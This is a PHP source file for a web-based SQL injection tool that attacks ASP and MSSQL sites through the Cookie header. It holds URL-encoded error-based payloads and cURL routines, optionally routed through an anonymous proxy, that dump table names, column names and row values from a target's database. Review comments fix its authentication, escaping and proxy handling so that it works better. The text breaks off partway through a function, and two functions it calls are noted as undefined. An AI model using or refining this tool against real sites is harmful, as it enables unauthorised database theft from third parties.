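<?php
// HTTP Basic auth gate for the tool.
//
// The credentials are hard-coded (left as found; they belong in config outside
// the web root). The important change is the exit after the 401: previously the
// WWW-Authenticate / 401 headers were sent but execution continued, so the
// whole page — including "Launch Attack" — was reachable without a password.
$auth_ok = 0;
$user = isset($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : null;
$pass = isset($_SERVER['PHP_AUTH_PW']) ? $_SERVER['PHP_AUTH_PW'] : null;
if (isset($user) && isset($pass) && $user === 'admin' && $pass === 'mika520') {
    $auth_ok = 1;
}
if (!$auth_ok) {
    header('WWW-Authenticate: Basic realm="Top Secret Area"');
    header('HTTP/1.0 401 Unauthorized');
    exit('401 Unauthorized');
}

// Form fields, all operator-supplied request data. Missing fields become null
// (the form logic below tests them with isset()/empty()). Every one of these
// is echoed back into the page later and must be HTML-escaped at that point.
$cookie     = isset($_POST['_cookie'])    ? $_POST['_cookie']    : null;
$referer    = isset($_POST['_referer'])   ? $_POST['_referer']   : null;
$url        = isset($_POST['_url'])       ? $_POST['_url']       : null;
$t_name     = isset($_POST['_tablename']) ? $_POST['_tablename'] : null;
$tab_name   = isset($_POST['_tabname'])   ? $_POST['_tabname']   : null;
$field_name = isset($_POST['_fieldname']) ? $_POST['_fieldname'] : null;
$proxy      = isset($_POST['_proxy'])     ? $_POST['_proxy']     : null;
$useproxy   = isset($_POST['_useproxy'])  ? $_POST['_useproxy']  : null;
$_action    = isset($_POST['_action'])    ? $_POST['_action']    : null;
$_btype     = isset($_POST['_btype'])     ? $_POST['_btype']     : null;
?>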
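<html>
<head>
<title>Asp+Mssql Cookie Sql Injection Tool</title>
<style>body{font-family:trebuchet ms;font-size:16px;color:green;background-color:black}hr{width:100%;height:2px;}</style>
</head>
<body>
<?php
// Escape a value for an HTML attribute/text context. Everything reflected into
// this form is request data ($_POST fields, and PHP_SELF which carries request
// path info), so echoing it raw lets a crafted link or POST run script in the
// browser of whoever is operating the tool.
function html_attr($value)
{
    return htmlspecialchars((string)$value, ENT_QUOTES);
}
?>
<center><h1>Asp+Mssql Sql Cookie Injection Tool Beta 1 by Mika[EST]</h1></center>
<hr><hr>
<form action="<?=html_attr($_SERVER['PHP_SELF'])?>" method="POST">
<center>
<table>
<tr><td><b>Exploitable Url: </b><input type="text" name="_url" size=60 value="<?=html_attr($url)?>" /><?php if (isset($url) && empty($url)) echo "<font color=red> unspecified</font>\n"; ?></td></tr>
<tr><td><b>Exploitable Cookie: </b><input type="text" name="_cookie" size=60 value="<?=html_attr($cookie)?>" /><?php if (isset($cookie) && empty($cookie)) echo "<font color=red> unspecified</font>\n"; ?></td></tr>
<tr><td><b>Referer Url: </b><input type="text" name="_referer" size=60 value="<?=html_attr($referer)?>" /><?php if (isset($referer) && empty($referer)) echo "<font color=red> unspecified</font>\n"; ?></td></tr>
<tr><td><input type="radio" name="_btype" value="num" <?php if (empty($_btype) || $_btype == "num") echo "checked"; ?>>Num Type</input> <input type="radio" name="_btype" value="char" <?php if ($_btype == "char") echo "checked"; ?>>Char Type</input></td></tr>
<tr><td><input type="radio" name="_action" value="exp_tabs" <?php if (empty($_action) || $_action == "exp_tabs") echo "checked"; ?> onclick="_tablename.disabled=true;_fieldname.disabled=true;_tabname.disabled=true;">Explode Tables Of Current DataBase</input></td></tr>
<tr><td><input type="radio" name="_action" value="exp_fields" onclick="_tablename.disabled=false;_fieldname.disabled=true;_tabname.disabled=true;" <?php if ($_action == "exp_fields") echo "checked"; ?>>Explode Fields Of </input><input type="text" name="_tablename" size=30 value="<?php if (!empty($tab_name)) echo html_attr($tab_name); else echo html_attr($t_name); ?>" <?php if ($_action != "exp_fields") echo "disabled"; ?> /></td></tr>
<tr><td><input type="radio" name="_action" value="exp_values" onclick="_tablename.disabled=true;_fieldname.disabled=false;_tabname.disabled=false;" <?php if ($_action == "exp_values") echo "checked"; ?>>Explode Values Of </input><input type="text" name="_fieldname" size=30 value="<?=html_attr($field_name)?>" <?php if ($_action != "exp_values") echo "disabled"; ?>/> IN <input type="text" name='_tabname' size=20 value="<?php if (!empty($t_name)) echo html_attr($t_name); else echo html_attr($tab_name); ?>" <?php if ($_action != "exp_values") echo "disabled"; ?> /></td></tr><br>
<tr><td><input type="checkbox" name="_useproxy" value="use_proxy" onclick="javascript:if(this.checked==true){_proxy.disabled=false;}else {_proxy.disabled=true;}" <?php if (isset($useproxy) && !empty($proxy)) echo "checked"; ?>>Via Anonymous Proxy <input type="text" name="_proxy" size=30 value="<?=html_attr($proxy)?>" <?php if (empty($proxy)) echo "disabled=true"; ?> ></input></td></tr>
<tr><td><input type="submit" name="_submit" value="Launch Attack"></input><?php echo str_repeat(' ', 50); ?><input type="reset" name="_reset" value="Reset Attack"></input></td></tr>
</table>
</center>
</form>
<hr><hr>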
<?php
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
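// Payload templates. They are already URL-encoded because they are spliced
// verbatim into the Cookie header; MFM_* tokens are replaced with
// operator-supplied names before use. nchar(124) is '|', the delimiter the
// response parser looks for around the extracted value.
$tab_exp = "%20and%201=(select%20top%201%20nchar(124)%2bname%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85)%20and%20name%20not%20in(MFM_TABLES))--";
$field_exp = "%20and%20(select%20top%201%20nchar(124)%2Bcol_name(object_id(TABLE_NAME),MFM_NUM)%2Bnchar(124)%20from%20sysobjects)%3E0--";
$value_exp = "%20and%20(select%20top%201%20nchar(124)%2Bcast(MFM_FIELD_NAME%20as%20varchar(8000))%2Bnchar(124)%20from%20MFM_TABLE_NAME%20where%20MFM_FIELD_NAME%20not%20in(MFM_VALUE))%3E0--";
$count_exp = "%20and%20(select%20nchar(124)%2Bcast(%20count(*)%20as%20varchar(255))%2bnchar(124)%20from%20MFM_TABLE_NAME)%3E0--";
$count_table = "%20and%201=(select%20top%201%20nchar(124)%2bcast(count(*)%20as%20varchar(8000))%2bnchar(124)%20from%20sysobjects%20where%20xtype=nchar(85))--";
$count_column = "%20and%201=(select%20nchar(124)%2Bcast(count(*)%20as%20varchar(8000))%2Bnchar(124)%20from%20syscolumns%20where%20id=object_id(MFM_TABLE_NAME))--";
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Dispatch. Runs only on an actual submit with the three mandatory fields.
// Every value echoed here is operator input and is HTML-escaped so the tool's
// own page cannot be used to run script in the operator's browser.
if (array_key_exists("_submit", $_POST) && !empty($url) && !empty($cookie) && !empty($referer)) {
    // A missing injection type matches the form's default radio ("num").
    $bstr = !empty($_POST['_btype']) ? $_POST['_btype'] : 'num';
    $action = isset($_POST['_action']) ? $_POST['_action'] : '';
    $url_h = htmlspecialchars($url, ENT_QUOTES);
    $cookie_h = htmlspecialchars($cookie, ENT_QUOTES);
    $referer_h = htmlspecialchars($referer, ENT_QUOTES);

    echo "<div align=left><b>:::Attack Parameters:::</b><br>\n";
    echo "<b>Target Url:</b><font color=blue>$url_h</font><br>\n";
    echo "<b>Target Cookie:</b><font color=blue>\"$cookie_h\"</font><br>\n";
    echo "<b>Referer Url:</b><font color=blue>$referer_h</font><br>\n";
    echo "<b>Injection Type:</b>";
    switch ($bstr) {
        case 'num':
            echo "<font color=blue>number</font><br>\n";
            $bstr = 0; // numeric injection point: payload is appended as-is
            break;
        case 'char':
            echo "<font color=blue>character</font><br>\n";
            $bstr = 1; // string injection point: payload is prefixed with %27
            break;
        default:
            // Previously an unknown value stayed a (truthy) string and was
            // silently treated as the character type.
            die("<font color=red>Error:injection type must be num or char!</font><br>");
    }
    $via_proxy = isset($useproxy) && !empty($proxy);
    echo "<b>Via Proxy:</b>" . ($via_proxy ? '<font color=blue>Yes</font>' : '<font color=blue>No</font>') . "<br>\n";
    if ($via_proxy) {
        echo "<b>Proxy Address:</b><font color=blue>" . htmlspecialchars($proxy, ENT_QUOTES) . "</font><br>\n";
    }
    echo "<b>Injection Action:</b>";
    // NOTE(review): exploit_tab() and exploit_field() are not defined in the
    // part of the file reviewed here (explode_tab() below looks like a sibling);
    // confirm they exist before relying on those two actions.
    switch ($action) {
        case 'exp_tabs':
            echo "<font color=blue>Explode Table Names</font><br>\n</div>\n";
            exploit_tab();
            break;
        case 'exp_fields':
            echo "<font color=blue>Explode Table Fields</font><br>\n";
            if (empty($t_name)) {
                die("<font color=red>Error:table name must be specified!</font><br>");
            }
            $table_name = $t_name;
            echo "<b>Table Name:</b><font color=blue>" . htmlspecialchars($table_name, ENT_QUOTES) . "</font><br>\n</div>\n";
            exploit_field();
            break;
        case 'exp_values':
            echo "<font color=blue>Explode Table Values</font><br>\n";
            if (empty($tab_name)) {
                die("<font color=red>Error:table name must be specified!</font><br>");
            }
            if (empty($field_name)) {
                die("<font color=red>Error:field name must be specified!</font><br>");
            }
            $table_name = $tab_name;
            echo "<b>Table Name:</b><font color=blue>" . htmlspecialchars($table_name, ENT_QUOTES) . "</font><br>\n";
            echo "<b>Fields Name:</b><font color=blue>" . htmlspecialchars(str_replace(",", " ", $field_name), ENT_QUOTES) . "</font><br>\n</div>\n";
            explode_value();
            break;
    }
}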
///////////////////////////////////////////////////////////////////////////////////////
/**
 * Open the result table: a horizontal rule, a centred div and a bordered
 * <table>. flush() is called after the write, presumably so partial results
 * reach the browser while the extraction is still running.
 */
function output_start()
{
    $opening = "<hr><br>\n"
        . "<div align=center>\n"
        . "<table border=\"1\">\n";
    print $opening;
    flush();
}
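/**
 * Emit one header cell of the result table, or open/close a header row.
 *
 * @param string $th 'tr' opens a row, '/tr' closes it; anything else is
 *                   rendered as a <th>.
 *
 * Cell text is HTML-escaped. Header text here is the operator's field list,
 * but output_td() shares this layout for values that come straight from the
 * target's response, so both paths escape to keep a hostile target (or a
 * typo'd field name) from injecting markup into the operator's browser.
 */
function output_th($th)
{
    if ($th === 'tr') {
        echo "<tr>";
    } elseif ($th === '/tr') {
        echo "</tr>\n";
    } else {
        echo "<th><font color=blue>" . htmlspecialchars((string)$th, ENT_QUOTES) . "</font></th>\n";
    }
    flush();
}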
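/**
 * Emit one data cell of the result table, or open/close a row.
 *
 * @param string $td 'tr' opens a row, '/tr' closes it; anything else is
 *                   rendered as a <td>.
 *
 * Cell text is HTML-escaped: it is extracted from the target server's HTTP
 * response, so without escaping a target that plants "<script>" in a table
 * name or row value executes it in the browser of whoever runs this tool.
 */
function output_td($td)
{
    if ($td === 'tr') {
        echo "<tr>";
    } elseif ($td === '/tr') {
        echo "</tr>\n";
    } else {
        echo "<td><font color=blue>" . htmlspecialchars((string)$td, ENT_QUOTES) . "</font></td>\n";
    }
    flush();
}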
/**
 * Close the result table and its containing div, then flush so the tail of
 * the output is delivered immediately.
 */
function output_end()
{
    $closing = "</table></div><br>\n";
    print $closing;
    flush();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Dump the values of the selected fields, one row per request.
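/**
 * Dump rows of $table_name for the requested columns and print them as a table.
 *
 * Reads via globals: $bstr (0 = numeric injection point, otherwise a %27 quote
 * is prefixed), $table_name, $field_name (comma-separated column list),
 * $cookie (must contain the MIKA marker that the payload replaces),
 * $count_exp (row-count payload template). $curl is the handle shared with
 * init_session()/find_value().
 *
 * Flow: one request for the row count, then one request per row i using a
 * "Select Top i ... Order by" subquery re-ordered descending so the i-th row
 * floats to the top. Columns are joined with char(92) ('\') on the server and
 * split on it here. Whether find_value() returns false or '' on a miss is not
 * visible in this file; the truthiness check below tolerates both.
 */
function explode_value()
{
    global $bstr, $table_name, $field_name, $cookie, $count_exp, $curl;

    $fields = explode(",", $field_name);

    // Select list: every column cast to varchar with NULL -> space, joined by '\'.
    $select_parts = array();
    foreach ($fields as $field) {
        $select_parts[] = "+isNull(cast([$field] as varchar(8000)),char(32))";
    }
    // Reverse ordering so "Top MIKA_NUM ... Order by" yields the MIKA_NUM-th row.
    $order_desc = array();
    foreach ($fields as $field) {
        $order_desc[] = "$field desc";
    }
    $sql_str = " And (Select Top 1 nchar(124)"
        . implode("+char(92)", $select_parts)
        . "+nchar(124) from (Select Top MIKA_NUM $field_name From [MIKA_TABLE] Where 1=1 Order by $field_name) T Order by "
        . implode(",", $order_desc)
        . ")>0--";
    $sql_str = str_replace('MIKA_TABLE', $table_name, $sql_str);

    // Quote prefix for string-context injection points; the templates are
    // otherwise identical for both types.
    $prefix = $bstr ? '%27' : '';

    init_session();
    output_start();

    // Row count first; it bounds the per-row loop.
    $count_payload = str_replace('MFM_TABLE_NAME', $table_name, $count_exp);
    $count = 0;
    $re = find_value(str_replace('MIKA', $prefix . $count_payload, $cookie));
    if ($re) {
        // The count comes from the target. Casting keeps a non-numeric reply
        // from turning "$i <= $count" into a string comparison (which could
        // loop indefinitely) and makes it safe to echo unescaped.
        $count = (int)$re;
        echo "<b>the number of record in " . htmlspecialchars($table_name, ENT_QUOTES)
            . ":</b> <font color=blue>$count</font>\n";
    }

    output_th('tr');
    foreach ($fields as $field) {
        output_th($field);
    }
    output_th('/tr');

    // Always try row 1 even if the count query failed (count stays 0).
    $i = 1;
    do {
        $row_sql = str_replace('MIKA_NUM', (string)$i, $sql_str);
        $re = find_value(str_replace('MIKA', $prefix . urlencode($row_sql), $cookie));
        output_td('tr');
        if ($re) {
            foreach (explode("\\", $re) as $cell) {
                output_td($cell);
            }
        }
        output_td('/tr');
        $i++;
    } while ($i <= $count);
    output_end();
}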
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Alternative method of dumping the table names.
/**
 * Alternative table-name dump: walks sysobjects ordered by id, fetching the
 * MIKA_NUM-th user table (xtype 'U') per request, until a request yields the
 * same name as the previous one or nothing at all. Names are printed eight
 * per row.
 *
 * Reads $bstr (non-zero => prefix a %27 quote), $cookie (contains the MIKA
 * marker); $curl is the handle set up by init_session().
 */
function explode_tab()
{
    global $bstr, $curl, $cookie;
    $template = " And (Select Top 1 nchar(124)+cast(name as varchar(8000))+nchar(124) from(Select Top MIKA_NUM id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0--";
    $quote = $bstr ? "%27" : "";

    init_session();

    // Eight identical header cells, one per grid column.
    output_th('tr');
    for ($col = 0; $col < 8; $col++) {
        output_th('Tables');
    }
    output_th('/tr');

    output_td('tr');
    $previous = "";
    $num = 1;
    while (true) {
        $payload = str_replace('MIKA_NUM', $num, $template);
        $found = find_value(str_replace('MIKA', $quote . urlencode($payload), $cookie));
        // A repeat of the previous name means "Top n" ran past the last table.
        if ($found == $previous) {
            break;
        }
        output_td($found);
        if ($num % 8 == 0) {
            output_td('/tr');
            output_td('tr');
        }
        $previous = $found;
        $num++;
        if (!$found) {
            break;
        }
    }
    output_td('/tr');
    output_end();
}
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Initialise the shared cURL session.
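/**
 * Create the shared cURL handle in the global $curl for this run.
 *
 * Reads $url (target), $referer (sent as the Referer header) and, when the
 * "Via Anonymous Proxy" box was ticked, $useproxy/$proxy.
 *
 * Fix: $useproxy was not in the global list, so isset($useproxy) was always
 * false inside this function and CURLOPT_PROXY was never set — the page
 * reported "Via Proxy: Yes" while every request went out directly from this
 * host.
 */
function init_session()
{
    global $proxy, $useproxy, $curl, $referer, $url;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_REFERER, $referer);
    curl_setopt($curl, CURLOPT_URL, $url);
    if (isset($useproxy) && !empty($proxy)) {
        curl_setopt($curl, CURLOPT_PROXY, "$proxy");
    }
}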
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
// Generic helper that sends one cookie payload and extracts the returned value.
function find_value($cookie){
global $curl;
//echo $cookie.\"\n\";
curl_setopt($curl,CURLOPT_COOKIE,$cookie);
$content=curl_exec($curl);
//echo $content;
$re=preg_match(\"/(\|.+